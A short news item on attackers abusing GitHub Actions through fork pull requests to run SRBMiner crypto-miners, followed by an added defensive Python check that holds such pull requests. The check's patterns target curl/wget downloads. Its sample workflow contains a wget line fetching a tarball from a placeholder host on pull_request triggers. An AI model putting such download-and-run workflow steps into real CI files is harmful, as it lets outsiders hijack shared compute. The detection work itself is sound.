Hackers are using GitHub cloud infrastructure to covertly mine multiple crypto assets, The Record reported.
The attacks were first spotted by a French software engineer in November last year, a fact the platform’s team confirmed to The Record last week via email.
The attack abused a GitHub feature called GitHub Actions, which lets users automatically execute tasks and workflows triggered by a particular event that happens inside their repositories. To launch cryptocurrency mining software, the attackers would fork an existing repository, add a malicious GitHub Actions element to the original code, then file a Pull Request with the original repository to merge the code back into the original, The Record wrote.
The original project owner didn’t need to approve the malicious Pull Request: right after it had been filed, GitHub’s systems would read the attacker’s code and launch a virtual machine that might download and run crypto-mining software, as Dutch security engineer Justin Perdok told The Record. He added that “attackers spin up to 100 crypto-miners via one attack alone, creating huge computational loads for GitHub’s infrastructure.”
The mining software, according to screenshots published by The Record, included SRBMiner, software for mining multiple cryptocurrencies on easy-to-buy consumer hardware, namely GPUs and CPUs.
In any case, it seems the attackers did not look to damage the repositories in any way, only to get free coins using GitHub servers, the report explains.
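A defender's view of the flow described above, as an added example that is not from The Record's report or from GitHub: a Python check that holds pull requests from forks when they add or change files under `.github/workflows/`, so a maintainer reviews them before any CI run. The indicator patterns, function names and the sample pull request are assumptions constructed for illustration.

```python
import re

# Workflow definitions live under this path in a repository.
WORKFLOW_PATH = re.compile(r"^\.github/workflows/[^/]+\.ya?ml$")

# Heuristic indicators (assumptions for this example, not an exhaustive list).
INDICATORS = {
    "pr_trigger": re.compile(
        r"^\s*on:.*\bpull_request\b|^\s*pull_request\s*:", re.M),
    "remote_download": re.compile(r"\b(curl|wget)\b[^\n]*https?://", re.I),
    "miner_name": re.compile(r"srbminer", re.I),  # name taken from the report
}

def review_pull_request(changed_files, from_fork):
    """changed_files maps path -> new file content.
    Returns [(workflow_path, [indicator names])] for every touched workflow."""
    findings = []
    for path, content in changed_files.items():
        if not WORKFLOW_PATH.match(path):
            continue  # only workflow definitions can start CI jobs
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(content))
        if from_fork:
            hits.insert(0, "workflow_changed_by_fork")
        findings.append((path, hits))
    return findings

def needs_maintainer_approval(findings):
    """Hold CI when an outside contributor touched any workflow file."""
    return any("workflow_changed_by_fork" in hits for _, hits in findings)

# Constructed sample: a fork's pull request that edits docs and a workflow.
SAMPLE_PR = {
    "README.md": "docs tweak\n",
    ".github/workflows/ci.yml": (
        "on: [pull_request]\n"
        "jobs:\n"
        "  build:\n"
        "    runs-on: ubuntu-latest\n"
        "    steps:\n"
        "      - run: wget https://example.invalid/tool.tar.gz\n"
    ),
}

if __name__ == "__main__":
    result = review_pull_request(SAMPLE_PR, from_fork=True)
    for path, hits in result:
        print(path, hits)
    print("hold for approval:", needs_maintainer_approval(result))
```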